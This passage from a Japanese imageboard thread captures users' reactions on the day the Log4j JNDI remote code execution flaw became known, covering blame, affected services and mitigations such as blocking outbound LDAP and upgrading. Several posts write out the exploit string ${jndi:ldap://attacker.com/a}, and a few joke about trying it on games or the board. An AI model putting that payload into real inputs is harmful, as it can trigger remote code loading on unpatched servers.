249 21/12/10(金)19:10:00 No.874962184
>うちはKotlinだから… kotlinにもあるから...
250 21/12/10(金)19:10:07 No.874962213
javaアプデすれば大丈夫?
251 21/12/10(金)19:10:11 No.874962231
>これでjavaがダメってなったら次はどの言語が主流になるの? 別にJavaがダメなわけではない …いやJDNIがダメなのか?
252 21/12/10(金)19:10:17 No.874962272
これで漏れたのかニコニコに不正ログインされてたって「」がいたな パスワード使いまわしてるやつは特にヤバい
253 21/12/10(金)19:10:26 No.874962328
今Java周りやってるプログラマによい年末を!って言ったら煽り文句扱いされそう
254 21/12/10(金)19:10:30 No.874962346
>>マイクラは本来の機能としてチャット部分にそのままチートコード入力して実行させる仕組みになってるから… >コンソールとチャットを一緒に実装してるゲームはそこそこあるからな…と思ったがマイクラくらいか? チャットコマンドがやたらと高機能で実質コンソールとして使ってるみたいなのはちょくちょくありそう
255 21/12/10(金)19:10:33 No.874962369
中国は今まで世界中で任意のプログラムを実行し放題だったのか
256 21/12/10(金)19:10:35 No.874962380
どうしてちょっとずつアップデートして来なかったんですかぁ…!
257 21/12/10(金)19:10:40 No.874962416
FF14で悪さ出来るか試してみるか
258 21/12/10(金)19:10:40 No.874962417
>しかし報告した中国人はよく気づいたな >暇潰しなコードを一行ずつよんでたのか? みんななんとなく気づいてて検証してたら大当たりが出たって感じにも見えるけど まあ他に確証に足る何かがあったのかもしれん
259 21/12/10(金)19:10:43 No.874962437
何の入力制限もないテキストフォームで入力文字列をそのままログ出力するなんてそんなあるか?と思ったけどまぁまぁあるな多分
260 21/12/10(金)19:10:44 No.874962445
>しかし報告した中国人はよく気づいたな >暇潰しなコードを一行ずつよんでたのか? 中国のPCオタクはゼロデイ見つけて一人前みたいなところあるから おかげで中国内のサイトは改竄されまくりになってる
261 21/12/10(金)19:10:51 No.874962476
でもこれ自体のログが出力されるから流出と破壊くらいしかやる気とないよね
262 21/12/10(金)19:10:56 No.874962519
前職はしんじんの仕事の一環でSpring boot使ってた気がするけど大丈夫かな…まぁ止まると首都圏の生活が死ぬぐらいの会社だし流石に対応してるだろう…
263 21/12/10(金)19:10:59 No.874962538
>サーバー立てる人とチャットにコマンド打ち込むクソガキは別人でいいからヤバい そうか誰かが鯖だけ立ててチャットに書き込む文字列を公開したらそれを誰でも使い放題なのか
264 21/12/10(金)19:10:59 No.874962539
>これで漏れたのかニコニコに不正ログインされてたって「」がいたな >パスワード使いまわしてるやつは特にヤバい マイクラは平文で保存してるの…?
265 21/12/10(金)19:11:00 No.874962545
>javaアプデすれば大丈夫? ライブラリをアップデートしないとダメ
266 21/12/10(金)19:11:09 No.874962580
レスポンスがクラスなので実行してみましたって頭沸いてるのか?
267 21/12/10(金)19:11:09 No.874962582
なんかアップデート来てたけどこれだったのか?
268 21/12/10(金)19:11:15 No.874962611
>でもこれ自体のログが出力されるから流出と破壊くらいしかやる気とないよね 十分過ぎるわい!
269 21/12/10(金)19:11:15 No.874962612
>これでjavaがダメってなったら次はどの言語が主流になるの? コトリン
270 21/12/10(金)19:11:16 No.874962616
>どうしてちょっとずつアップデートして来なかったんですかぁ…! アプデするとテストしなきゃいけないんだ
271 21/12/10(金)19:11:20 No.874962649
別にjavaが悪い訳じゃねぇよ!?
272 21/12/10(金)19:11:23 No.874962665
>これで漏れたのかニコニコに不正ログインされてたって「」がいたな >パスワード使いまわしてるやつは特にヤバい 俺もやられた パキスタンから謎のログインがあった 大昔に作ってもう使ってなかった垢だったので2段階にした上で退会して終わった
273 21/12/10(金)19:11:46 No.874962787
月末じゃなかった優しさ
274 21/12/10(金)19:11:47 No.874962792
kotlin でも log4j じゃないの普通は Scala はどうなんだろう
275 21/12/10(金)19:11:48 No.874962795
>外向けのサービスで未だにJavaなんて使ってるのか サーバサイドはまだJava多いんじゃない?
276 21/12/10(金)19:11:51 No.874962819
javaのせい~ javaのせい~
277 21/12/10(金)19:11:56 No.874962846
javaのライブラリの脆弱性であってjava自体は関係無いでしょ
278 21/12/10(金)19:12:00 No.874962881
>コトリン こいつにも影響するの笑う
279 21/12/10(金)19:12:01 No.874962889
>別にjavaが悪い訳じゃねぇよ!? php最低だよ…
280 21/12/10(金)19:12:03 No.874962900
ファイアウォールで出ていくリクエスト制限したらどうにかなりませんか?
281 21/12/10(金)19:12:06 No.874962921
これでjavaが悪いよとか言ってるとこいつ何も知らないんだな…って思われるから気を付けて!
282 21/12/10(金)19:12:06 No.874962922
>でもこれ自体のログが出力されるから流出と破壊くらいしかやる気とないよね ミ…ミーにはどちらか片方だけでも重大な問題に思える…
283 21/12/10(金)19:12:09 No.874962938
>別にjavaが悪い訳じゃねぇよ!? でも根本的にはjndiが悪さしてるし…
284 21/12/10(金)19:12:10 No.874962940
俺のアカウントは何故か毎週のようにログイン試してもないのに2段階認証がくるよ
285 21/12/10(金)19:12:16 No.874962972
あれ?ほどーぷは平気?
286 21/12/10(金)19:12:17 No.874962976
>ログの中にJavaへの命令文が含まれてるとそれをそのまま実行しちゃう こういうの普通実装前に気付くもんじゃないの…? 実装して8年も一体何を
287 21/12/10(金)19:12:19 No.874962993
やっぱnodejsだわ
288 21/12/10(金)19:12:26 No.874963026
>レスポンスがクラスなので実行してみました ラノベのタイトルみたい
289 21/12/10(金)19:12:31 No.874963052
二段階認証は必須の時代だな
290 21/12/10(金)19:12:39 No.874963098
>javaのライブラリの脆弱性であってjava自体は関係無いでしょ ライブラリ使わずに作れと?
291 21/12/10(金)19:12:43 No.874963116
同じパターンでJDNI使ってリンクしてるライブラリ他にないかもう探されてそうな気がする
292 21/12/10(金)19:12:44 No.874963120
>でもこれ自体のログが出力されるから流出と破壊くらいしかやる気とないよね まだどのセキュリティベンダーもシグネチャリリースまで行ってないだろうし今ならやり放題なのでは?
293 21/12/10(金)19:12:44 No.874963122
>これで漏れたのかニコニコに不正ログインされてたって「」がいたな >パスワード使いまわしてるやつは特にヤバい 自分で毎回忘れるレベルだからセキュリティバッチリだぜ!!!
294 21/12/10(金)19:12:45 No.874963129
SEに休息の日はない
295 21/12/10(金)19:12:47 No.874963141
log4j2はそんなに使われてない印象ではあるのが救い
296 21/12/10(金)19:12:49 No.874963151
普通はjavaの資産が使えるからalt javaにしてるんだもんな…
297 21/12/10(金)19:12:54 No.874963183
共産党にはとっくの昔に報告済ませてそう
298 21/12/10(金)19:13:02 No.874963227
>マイクラは平文で保存してるの…? βの頃はローカルに保存してたけど10年前からログインセッションのUUIDしか保存してないよ
299 21/12/10(金)19:13:03 No.874963232
これもしかしてかなり洒落にならない奴…?
300 21/12/10(金)19:13:13 No.874963286
>log4j2はそんなに使われてない印象ではあるのが救い いやいや いやいやいやいや
301 21/12/10(金)19:13:15 No.874963297
Java何でもできすぎじゃない? もっとキツイ縛り作って何もできないようにしないと…
302 21/12/10(金)19:13:17 No.874963311
>これもしかしてかなり洒落にならない奴…? はい
303 21/12/10(金)19:13:17 No.874963313
具体的にどういうものにあるわけ? win10でオンゲとブラウジングだけしてる場合安全? ディスコやヒは大丈夫?
304 21/12/10(金)19:13:21 No.874963330
Javaなんも知らんけど主要なJavaフレームワークってだいたいこれ使ってたりする?
305 21/12/10(金)19:13:24 No.874963352
>ファイアウォールで出ていくリクエスト制限したらどうにかなりませんか? 内→外のLADP通さなければ成立しない攻撃だから修正までの時間は稼げる気がしてる これ迂回する方法あったら誰か指摘してほしい
306 21/12/10(金)19:13:34 No.874963420
>log4j2はそんなに使われてない印象ではあるのが救い そうかな…そうかな…
307 21/12/10(金)19:13:39 No.874963457
陰謀論大好きな「」多いな…
308 21/12/10(金)19:13:41 No.874963467
でもちょいで修正できちゃうんでしょ? 月曜までによろ!
309 21/12/10(金)19:13:49 No.874963513
例えば虹裏がアウトだとするとここの書き込みにfoo.get()とか書くとそのまま実行される…ってコト!?
310 21/12/10(金)19:13:57 No.874963567
>これもしかしてかなり洒落にならない奴…? 世界規模だからな…
311 21/12/10(金)19:14:13 No.874963658
>陰謀論大好きな「」多いな… この脆弱性1月前にスレ建てたら陰謀扱いされて誰も信じないだろ
312 21/12/10(金)19:14:13 No.874963662
>陰謀論大好きな「」多いな… だってそうでも思わないとやらかしが酷すぎるし…
313 21/12/10(金)19:14:14 No.874963668
>でもちょいで修正できちゃうんでしょ? >月曜までによろ! じゃあversion上げておくから全機能テストよろしくね
314 21/12/10(金)19:14:15 No.874963672
>具体的にどういうものにあるわけ? >win10でオンゲとブラウジングだけしてる場合安全? >ディスコやヒは大丈夫? ユーザー側でできることはないから面白がって眺めておくくらいでいいよ
315 21/12/10(金)19:14:24 No.874963717
>しかし報告した中国人はよく気づいたな Alibaba Cloudセキュリティチームだからプロ中のプロだ
316 21/12/10(金)19:14:24 No.874963719
>でもちょいで修正できちゃうんでしょ? >月曜までによろ! 修正するだけなら実際すぐできちゃうよ 検証しろとかいわなければ
317 21/12/10(金)19:14:28 No.874963737
今回の欠陥って本来は何のためにあるんだ?
318 21/12/10(金)19:14:29 No.874963746
>具体的にどういうものにあるわけ? >win10でオンゲとブラウジングだけしてる場合安全? >ディスコやヒは大丈夫? どのシステムがJavaで作ってるのかわからないからなんとも
319 21/12/10(金)19:14:32 No.874963762
ボジョレー風に言うと20年に一度の大厄災
320 21/12/10(金)19:14:32 No.874963765
>例えば虹裏がアウトだとするとここの書き込みにfoo.get()とか書くとそのまま実行される…ってコト!? クラスファイルのパス書いてたら実行されるんじゃない?
321 21/12/10(金)19:14:35 No.874963776
早いうちにlogbackに切り替えたかlog4j1のままかって感じじゃない?
322 21/12/10(金)19:14:38 No.874963792
どういう場合に影響があるか分からない人はまず関係ないから気にしなくて大丈夫だ
323 21/12/10(金)19:14:49 No.874963854
log4j にこんな意味不明な機能があったの初めて知った
324 21/12/10(金)19:15:04 No.874963943
こんな穴どうやって見つけてるんだろう…
325 21/12/10(金)19:15:09 No.874963984
>ユーザー側でできることはないから面白がって眺めておくくらいでいいよ 攻撃できないの?
326 21/12/10(金)19:15:10 No.874963996
つまり簡単に言うとjavaライブラリあるチャットでコマンド書いたら相手のPCで実行されたってことです…?
327 21/12/10(金)19:15:11 No.874963997
虹裏でID出し放題に出来る可能性があるのか夢があるな
328 21/12/10(金)19:15:18 No.874964046
今こんな気持ち
329 21/12/10(金)19:15:20 No.874964061
昔から知ってて悪用してたやつ正直に手をあげなさい
330 21/12/10(金)19:15:25 No.874964100
直接使ってなくても影響あるのが味噌な
331 21/12/10(金)19:15:25 No.874964103
年末壊れちゃう?
332 21/12/10(金)19:15:31 No.874964136
>こんな穴どうやって見つけてるんだろう… いつも思うけど見つける人すごいよね
333 21/12/10(金)19:15:31 No.874964138
>log4j にこんな意味不明な機能があったの初めて知った 知ってる奴がいたらこんなことにならなかった
334 21/12/10(金)19:15:32 No.874964146
>>ファイアウォールで出ていくリクエスト制限したらどうにかなりませんか? >内→外のLADP通さなければ成立しない攻撃だから修正までの時間は稼げる気がしてる LDAPの通信を外に流す必要ってハイブリッドなActive Directory環境とかそういうの? それともそれ以外でも一般的な行為なの?
335 21/12/10(金)19:15:35 No.874964162
マジかよ最低だなD4DJ
336 21/12/10(金)19:15:37 No.874964182
>どういう場合に影響があるか分からない人はまず関係ないから気にしなくて大丈夫だ 関係ないことはないが…
337 21/12/10(金)19:15:37 No.874964186
>どういう場合に影響があるか分からない人はまず関係ないから気にしなくて大丈夫だ 一般ユーザーにできることはいつも通りのセキュリティ対策しかない…
338 21/12/10(金)19:15:38 No.874964195
Apacheってクソだわ
339 21/12/10(金)19:15:42 No.874964217
内部犯と連携できた可能性はあるし
340 21/12/10(金)19:15:49 No.874964250
>>こんな穴どうやって見つけてるんだろう… >いつも思うけど見つける人すごいよね 見つけたけど報告してない凄い人も何人も居たんだろうなあ……
341 21/12/10(金)19:16:04 No.874964326
どうすれば…どうすればいいんですか…!?
342 21/12/10(金)19:16:04 No.874964327
redisとかも引っかかってんのこれ?
343 21/12/10(金)19:16:04 No.874964328
>つまり簡単に言うとjavaライブラリあるチャットでコマンド書いたら相手のPCで実行されたってことです…? 攻撃用のサーバ自分で立ててないと無理でしょう
344 21/12/10(金)19:16:05 No.874964340
>ボジョレー風に言うと20年に一度の大厄災 つまり2000年問題くらいなのか…
345 21/12/10(金)19:16:07 No.874964348
>一般ユーザーにできることはいつも通りのセキュリティ対策しかない… 今すぐアンインストールしたほうがいいものとか…無い?
346 21/12/10(金)19:16:11 No.874964375
>例えば虹裏がアウトだとするとここの書き込みにfoo.get()とか書くとそのまま実行される…ってコト!? ${jndi:ldap://attacker.com/a} って書くとリンク先のコードがそのまま実行される
347 21/12/10(金)19:16:18 No.874964428
年末のこの時期にまったく想定してなかったこんなネタがいきなり飛び込んできて混乱しないとこあるかな…
348 21/12/10(金)19:16:21 No.874964449
各サービスの二段階認証あれば設定しておくくらいでは
349 21/12/10(金)19:16:30 No.874964521
影響範囲デカすぎて関係なくても心配なんじゃが
350 21/12/10(金)19:16:35 No.874964548
作ってる人間からしたら便利だしイーじゃんイーじゃん ってなもんで脆弱性だなんて思ってないだろ
351 21/12/10(金)19:16:42 No.874964597
Apacheは管理しきれなくなったOSSの肥溜めだから元からクソだよ
352 21/12/10(金)19:16:42 No.874964600
>って書くとリンク先のコードがそのまま実行される コワ~…
353 21/12/10(金)19:16:43 No.874964606
>内部犯と連携できた可能性はあるし 内部犯いたらなんでも出来る気がする
354 21/12/10(金)19:16:43 No.874964607
tomcat死すべし
355 21/12/10(金)19:17:03 No.874964729
ログ取るって目的から進んでイベント発行する何かみたいになってる なのでdbに入れたりメール飛ばしたりメッセージキューに入れたりする機能が満載
356 21/12/10(金)19:17:04 No.874964735
脆弱性なんてテストで想定外の動きしたとかじゃないと気づかないわ…
357 21/12/10(金)19:17:07 No.874964759
>各サービスの二段階認証あれば設定しておくくらいでは にだんかいにんしょう…?
358 21/12/10(金)19:17:11 No.874964789
最低だなJavaScript
359 21/12/10(金)19:17:14 No.874964803
どのサービスのバックエンドがjava製かなんて分からんもんな…
360 21/12/10(金)19:17:20 No.874964843
本来はログの内容にLDAPのエントリ(ユーザ名とか)を入れられたら便利ですよね的な意図の機能らしい
361 21/12/10(金)19:17:31 No.874964905
>作ってる人間からしたら便利だしイーじゃんイーじゃん >ってなもんで脆弱性だなんて思ってないだろ ログ吐かせただけなのにリモートコード実行すると思わないだろ普通
362 21/12/10(金)19:17:40 No.874964970
どっか適当なストアの入力欄にコード入れちゃうと任意のコードが動いちゃうかもしれないの怖すぎるだろ
363 21/12/10(金)19:17:49 No.874965023
そういえば昔から気になってたけどjavaって何ができるんです?
364 21/12/10(金)19:18:01 No.874965098
aws lambdaでもJava使えるからコード精査しないとだめですね
365 21/12/10(金)19:18:15 No.874965201
よくわからんけどこの問題で利用者としてなにかできる自衛ってのはあるのかい?
366 21/12/10(金)19:18:17 No.874965214
>そういえば昔から気になってたけどjavaって何ができるんです? なんでも
367 21/12/10(金)19:18:20 No.874965230
>どっか適当なストアの入力欄にコード入れちゃうと任意のコードが動いちゃうかもしれないの怖すぎるだろ つまり個人PCより外向けのサービスの人たちがやばい? 情報全部抜かれるかもしれんのか
368 21/12/10(金)19:18:24 No.874965251
>そういえば昔から気になってたけどjavaって何ができるんです? 定時退社
369 21/12/10(金)19:18:27 No.874965270
やっっばいわよ!?
370 21/12/10(金)19:18:27 No.874965280
確かに便利に使われそうな機能だが…
371 21/12/10(金)19:18:30 No.874965297
SAS、死ぬなこれ…
372 21/12/10(金)19:18:30 No.874965302
>そういえば昔から気になってたけどjavaって何ができるんです? なんでもできたね
373 21/12/10(金)19:18:38 No.874965348
修正版ではLDAPで使うドメインはlocalhostを除いて許可リスト制になるっぽいから外から来た悪意のあるコマンドは防げそう
374 21/12/10(金)19:18:43 No.874965372
RTAのエンディング召喚みたいな事ができるのか
375 21/12/10(金)19:18:44 No.874965378
ここの掲示板は大丈夫だよね?
376 21/12/10(金)19:18:44 No.874965381
>よくわからんけどこの問題で利用者としてなにかできる自衛ってのはあるのかい? ふるえて眠れ!
377 21/12/10(金)19:18:58 No.874965451
Write once, Run nowhere. 忘れちゃだめだよ
378 21/12/10(金)19:18:58 No.874965460
今北産業
379 21/12/10(金)19:19:02 No.874965490
段階認証すっ飛ばしてダイレクトアタックできるのか…
380 21/12/10(金)19:19:03 No.874965495
>>どっか適当なストアの入力欄にコード入れちゃうと任意のコードが動いちゃうかもしれないの怖すぎるだろ >つまり個人PCより外向けのサービスの人たちがやばい? >情報全部抜かれるかもしれんのか そうだよ フロントがjavaじゃなくてもバックエンドのAPIとかがJavaのサービスなんて腐る程あるよ ウチだよ
381 21/12/10(金)19:19:04 No.874965504
>定時退社 うそを つくな
382 21/12/10(金)19:19:16 No.874965579
今時任意コード実行なんて流行らな
383 21/12/10(金)19:19:22 No.874965618
…よし! 見なかったことにして寝るか!
384 21/12/10(金)19:19:23 No.874965632
情報抜かれるし消されるかもしれないし無関係なデータに変えたりもできる
385 21/12/10(金)19:19:23 No.874965634
インターネット史に残る出来事 影響は数年に及ぶだろうし
386 21/12/10(金)19:19:35 No.874965713
>各サービスの二段階認証あれば設定しておくくらいでは その認証システムもいじれるのでは?
387 21/12/10(金)19:19:39 No.874965739
>Write once, Run nowhere. >忘れちゃだめだよ つまりどこでも任意のコードが実行できる…ってコト?!
388 21/12/10(金)19:19:40 No.874965745
FF5から魔大陸を呼び出せるってこと?
389 21/12/10(金)19:19:43 No.874965774
>そうだよ >フロントがjavaじゃなくてもバックエンドのAPIとかがJavaのサービスなんて腐る程あるよ へーそうなんだ >ウチだよ オイオイオイ
390 21/12/10(金)19:19:50 No.874965808
>ウチだよ 双葉見てる場合かァー!
391 21/12/10(金)19:19:55 No.874965841
なんでログクラスでLDAPとかいうよくわからないの参照に行く機能に繋がってるのかどっかに書いてるかな…
392 21/12/10(金)19:19:57 No.874965848
hello worldの精神を忘れるな
393 21/12/10(金)19:19:57 No.874965851
職場で使ってるJenkins今リモートで停めてきた Log4j使ってるか知らんけど一応ね…
394 21/12/10(金)19:20:11 No.874965915
>フロントがjavaじゃなくてもバックエンドのAPIとかがJavaのサービスなんて腐る程あるよ でもフロントに投げたリクエストをバックエンドに丸投げとかするんです?
395 21/12/10(金)19:20:13 No.874965934
銀行のシステムとかヤバそう
396 21/12/10(金)19:20:16 No.874965952
どうなるとアウトかと言うと ${jndi:ldap://attacker.com/a} これが何らかの形で読まれた瞬間終わる
397 21/12/10(金)19:20:17 No.874965958
ユーザーはあんまり関係ないというかできることは基本的にない
398 21/12/10(金)19:20:26 No.874966028
帰れないんですが…
399 21/12/10(金)19:20:31 No.874966062
顧客の情報流出とかパスワード流出とか言ってるニュースがjavaサービス使ってるとこどこでも可能だったってコト…?
400 21/12/10(金)19:20:32 No.874966068
コード書いたら実行できるって素人が作ったwebサービスじゃないんだからさ…
401 21/12/10(金)19:21:00 No.874966246
>どうなるとアウトかと言うと >${jndi:ldap://attacker.com/a} >これが何らかの形で読まれた瞬間終わる いもげがじゃばでうごいてたらこれ見たら死ぬってこと?
402 21/12/10(金)19:21:05 No.874966283
公式HPとかサーバー持ってるとこがやべーわけね…
403 21/12/10(金)19:21:10 No.874966308
javaを考えた所は責任とか取るの?
404 21/12/10(金)19:21:13 No.874966326
>どうなるとアウトかと言うと >${jndi:ldap://attacker.com/a} >これが何らかの形で読まれた瞬間終わる 書けてるということはimgは大丈夫なのか?
405 21/12/10(金)19:21:13 No.874966330
他の言語に移植とかされてないよね?
406 21/12/10(金)19:21:18 No.874966359
改ざんしたclassファイルを勝手に読み込むのか
407 21/12/10(金)19:21:21 No.874966372
>>どうなるとアウトかと言うと >>${jndi:ldap://attacker.com/a} >>これが何らかの形で読まれた瞬間終わる >いもげがじゃばでうごいてたらこれ見たら死ぬってこと? スレ開いたら死ぬんじゃね
408 21/12/10(金)19:21:29 No.874966434
該当してたらimgの権限乗っ取れるかもしれんわけか
409 21/12/10(金)19:21:29 No.874966435
そもそもLDAPでJavaのクラスファイル取ってこれるって何?と思ったらそれは正式な仕様らしい
410 21/12/10(金)19:21:31 No.874966441
よくわからないので通販サイトのクレカ情報消してきた
411 21/12/10(金)19:21:31 No.874966443
>>どうなるとアウトかと言うと >>${jndi:ldap://attacker.com/a} >>これが何らかの形で読まれた瞬間終わる >いもげがじゃばでうごいてたらこれ見たら死ぬってこと? ミネルヴァかな?
412 21/12/10(金)19:21:32 No.874966447
さすがにふたばはphpだけだろ多分…
413 21/12/10(金)19:21:32 No.874966451
>いもげがじゃばでうごいてたらこれ見たら死ぬってこと? はい というかAndroidの専用アプリでも何ならやばい
414 21/12/10(金)19:21:39 No.874966501
>javaを考えた所は責任とか取るの? ORACLEが腹を切ってお詫びします
415 21/12/10(金)19:21:39 No.874966508
大半の「」には出来ることはないし関係ある「」は悠長にこんなとこ見てるはずも無いのでワタワタしなくても平気よ
416 21/12/10(金)19:21:42 No.874966529
月曜までで大丈夫です!
417 21/12/10(金)19:21:42 No.874966538
>でもフロントに投げたリクエストをバックエンドに丸投げとかするんです? フロントの項目に入力した内容をログに吐いてたらアウトでは?
418 21/12/10(金)19:21:46 No.874966554
お祈り申し上げます
419 21/12/10(金)19:21:46 No.874966555
>いもげがじゃばでうごいてたらこれ見たら死ぬってこと? log4j2でログ吐いてればね
420 21/12/10(金)19:21:52 No.874966594
即死魔法じゃん…
421 21/12/10(金)19:21:56 No.874966616
>ここの掲示板は大丈夫だよね? ここはPHPだから関係ないな ソースはトップページ
422 21/12/10(金)19:22:05 No.874966682
>職場で使ってるJenkins今リモートで停めてきた >Log4j使ってるか知らんけど一応ね… よくやったな!使ってるぜ!
423 21/12/10(金)19:22:07 No.874966686
>>javaを考えた所は責任とか取るの? >ORACLEが腹を切ってお詫びします オラクル嫌いだからどんどん腹を切れ
424 21/12/10(金)19:22:10 No.874966705
リモートで共有ライブラリ読み込んで実行できるみたいなことか?
425 21/12/10(金)19:22:10 No.874966709
>>フロントがjavaじゃなくてもバックエンドのAPIとかがJavaのサービスなんて腐る程あるよ >でもフロントに投げたリクエストをバックエンドに丸投げとかするんです? そりゃ書き換えるけど入力欄に入れられたらフロントの文字チェックかエスケープしない限り回避不可だろうしいまは入力内容をログに出していないことを祈りながら帰ることしかできん…
426 21/12/10(金)19:22:10 No.874966711
ていうか皆オープンソースのライブラリ信用し過ぎじゃない…? 自分たちで安全性検証してるのアリババだけなの?ばかなの??
427 21/12/10(金)19:22:10 No.874966715
Android アプリで log4j 使ってる場合は?
428 21/12/10(金)19:22:14 No.874966751
>javaを考えた所は責任とか取るの? おらくるがわるい あいつがやった しらない すんだこと
429 21/12/10(金)19:22:15 No.874966759
あぷ小とかはやばそうな気がする
430 21/12/10(金)19:22:16 No.874966769
Androidはjndiの機能入ってないみたいな話を見た気はする
431 21/12/10(金)19:22:17 No.874966777
話聞いてると死ぬほどやばくね?
432 21/12/10(金)19:22:26 No.874966838
ユーザの入力内容をログに吐き出すシステム以外は関係ないはず 一般の人は個人情報とか流出するかもしれないけど出来ることはない
433 21/12/10(金)19:22:30 No.874966862
本気でこの不具合に関係がある立場の「」は今頃死にもの狂いで対応に追われてるだろうからこのスレに居るのってほぼ野次馬では?
434 21/12/10(金)19:22:52 No.874966981
>aws lambdaでもJava使えるからコード精査しないとだめですね 相手のS3に巨大なインスタンス立ち上げまくって延々とファイル作っては捨ててみたいな事が出来てたのしい 楽しくない
435 21/12/10(金)19:22:54 No.874966992
>Android アプリで log4j 使ってる場合は? AndroidSDKにlogライブラリあるのにそれ使ってたらバカだよ
436 21/12/10(金)19:22:57 No.874967006
>log4netは無事だったから良かった .netの移植の方もメンテナー居ないから別のに切り替えなされ
437 21/12/10(金)19:22:58 No.874967012
>本気でこの不具合に関係がある立場の「」は今頃死にもの狂いで対応に追われてるだろうからこのスレに居るのってほぼ野次馬では? はい
438 21/12/10(金)19:23:02 No.874967034
.NETしか使わないMS信者で良かった
439 21/12/10(金)19:23:06 No.874967056
俺は何も考えずに作るから多分ユーザーフォームの内容ログ出力してるぜ
440 21/12/10(金)19:23:09 No.874967083
ダミーコードでもどこぞの県警が勘違いしちゃうだろ
441 21/12/10(金)19:23:20 No.874967145
アプリ経由で個人情報をシューッ!とかあるので…?
442 21/12/10(金)19:23:28 No.874967190
泥のアプリはよっぽど変な人が作ってない限りは大丈夫じゃない
443 21/12/10(金)19:23:32 No.874967215
>そもそもLDAPでJavaのクラスファイル取ってこれるって何?と思ったらそれは正式な仕様らしい わりとこの仕様自体イカれてるというか おおらかな時代は良かったかもしれないけど…っていう仕様だと思う
444 21/12/10(金)19:23:42 No.874967271
com.sun.jndi.ldap.object.trustURLCodebase これがデフォでfalseになってるから新し目のJVM使ってるところは修正までの時間稼げるはず…
445 21/12/10(金)19:23:43 No.874967277
今日休み取ってのんびりしてたのにこいつのせいで会社のslackがスコココうるせえことになった
446 21/12/10(金)19:23:44 No.874967282
>ていうか皆オープンソースのライブラリ信用し過ぎじゃない…? みんなが使ってるからヨシ!
447 21/12/10(金)19:23:44 No.874967284
企業でjava使って開発とかやってても気付かないもんなんだな…
448 21/12/10(金)19:23:51 No.874967322
書き込みをした人によって削除されました
449 21/12/10(金)19:23:54 No.874967333
>そういえば昔から気になってたけどjavaって何ができるんです? プログラミング言語はどれを使ってもまあ大体パソコンにできることはなんでもできるよ 色々ある言語の違いは機械へどういう仕事を命令しやすく作られてるかって感じなんであとは効率と好き嫌いの問題
450 21/12/10(金)19:24:01 No.874967379
System.out.printでログライブラリ頑張って作ろうな
451 21/12/10(金)19:24:10 No.874967428
なんでクラスファイル外に取りに行くの…?そういうもんなの?
452 21/12/10(金)19:24:12 No.874967441
>俺は何も考えずに作るから多分ユーザーフォームの内容ログ出力してるぜ そういうの自体は割と普通だからこそ今回のがやばい ロガーがなんで入力値をそのまま実行するんですか…?
453 21/12/10(金)19:24:15 No.874967462
cobolerなので失礼する
454 21/12/10(金)19:24:17 No.874967477
>>ていうか皆オープンソースのライブラリ信用し過ぎじゃない…? >みんなが使ってるからヨシ! 誰も安全性を確認していないのである!
455 21/12/10(金)19:24:21 No.874967499
世の中よく分らんけどちゃんと動いてるからヨシ!するだろ
456 21/12/10(金)19:24:28 No.874967535
>ていうか皆オープンソースのライブラリ信用し過ぎじゃない…? 赤信号 みんなで渡れば 大惨事
457 21/12/10(金)19:24:33 No.874967563
こんだけ使ってても致命的な穴分からんもんなんだな…
458 21/12/10(金)19:24:42 No.874967613
>世の中よく分らんけどちゃんと動いてるからヨシ!するだろ 動いちゃいけないとこ動いてる!
459 21/12/10(金)19:24:49 No.874967671
オラクルが買収したから置き土産を残してたんだろうな
460 21/12/10(金)19:24:55 No.874967712
>これがデフォでfalseになってるから新し目のJVM使ってるところは修正までの時間稼げるはず… よかったJava8だ…
461 21/12/10(金)19:24:57 No.874967720
なんだか良くわからんが世界の危機だと言うことはわかった
462 21/12/10(金)19:25:02 No.874967744
>本気でこの不具合に関係がある立場の「」は今頃死にもの狂いで対応に追われてるだろうからこのスレに居るのってほぼ野次馬では? 忘年会なくなったというレスはあり申した
463 21/12/10(金)19:25:07 No.874967771
>>ていうか皆オープンソースのライブラリ信用し過ぎじゃない…? >赤信号 >みんなで渡れば >大惨事 (皆)し…しんでる…
464 21/12/10(金)19:25:20 No.874967858
悪意を持って故意に仕込んだ実装に見えて仕方ない
465 21/12/10(金)19:25:20 No.874967859
imgで何か悪用できるかな? たとえばそうだねを無限に入れられたりとか
466 21/12/10(金)19:25:22 No.874967877
うちはJava使ってないけど他のサービスで巻き込まれたりせんだろうな
467 21/12/10(金)19:25:23 No.874967879
>オラクルが買収したから置き土産を残してたんだろうな 時限爆弾テロかよ
468 21/12/10(金)19:25:23 No.874967880
たぶん気づいた人は何人かはいただろうけど…
469 21/12/10(金)19:25:26 No.874967900
金土日が潰れそうな「」もいるだろう… なんか待機かかってるらしき「」も関連スレで見たし…
470 21/12/10(金)19:25:26 No.874967902
>よかったJava8だ… 死んでない?
471 21/12/10(金)19:25:27 No.874967903
欧米人のプログラマーのクリスマスは大丈夫か? 正月みたいなもんなんだろ?
472 21/12/10(金)19:25:35 No.874967949
>>これがデフォでfalseになってるから新し目のJVM使ってるところは修正までの時間稼げるはず… >よかったJava7だ…
473 21/12/10(金)19:25:47 No.874968026
マジでプログラマー「」が土日出勤なの? ジョークとかじゃなく?
474 21/12/10(金)19:25:49 No.874968042
お前にSunが救えるか
475 21/12/10(金)19:25:52 No.874968065
>ていうか皆オープンソースのライブラリ信用し過ぎじゃない…? >自分たちで安全性検証してるのアリババだけなの?ばかなの?? こんな事が起きるまで考えたこともなかったよ
476 21/12/10(金)19:25:53 No.874968076
みんな使ってるから不具合があったら俺以外が気づくだろがオープンソースだ
477 21/12/10(金)19:25:56 No.874968098
よくわかんないけどSQLインジェクション対策のついでで対策されてそうだし大丈夫だろう…
478 21/12/10(金)19:25:57 No.874968108
見ればわかるなんて見る人がいなけりゃ成り立たないんだ
479 21/12/10(金)19:25:58 No.874968112
>オラクルが買収したから置き土産を残してたんだろうな 邪悪か!
480 21/12/10(金)19:26:02 No.874968144
>たぶん気づいた人は何人かはいただろうけど… 見なかったことにしよ
481 21/12/10(金)19:26:16 No.874968228
全部Oracleのせいってことに出来ない?
482 21/12/10(金)19:26:19 No.874968258
VB.NET屋さんの俺には関係ないことだな…
483 21/12/10(金)19:26:20 No.874968266
すまない「」 Java8 はもう新しくないんだ…
484 21/12/10(金)19:26:32 No.874968331
ログを出すだけの能力だと思ってたら実は何でもできる能力者だった 泣きついてももう遅い!
485 21/12/10(金)19:26:33 No.874968338
>よかったJava8だ… 今西暦何年か言える?
486 21/12/10(金)19:26:35 No.874968352
つまり…どういうことだってばよ?
487 21/12/10(金)19:26:39 No.874968385
世界的なサイバー危機ってめっちゃワクワクするじゃん フィクションの中ならな
488 21/12/10(金)19:26:41 No.874968403
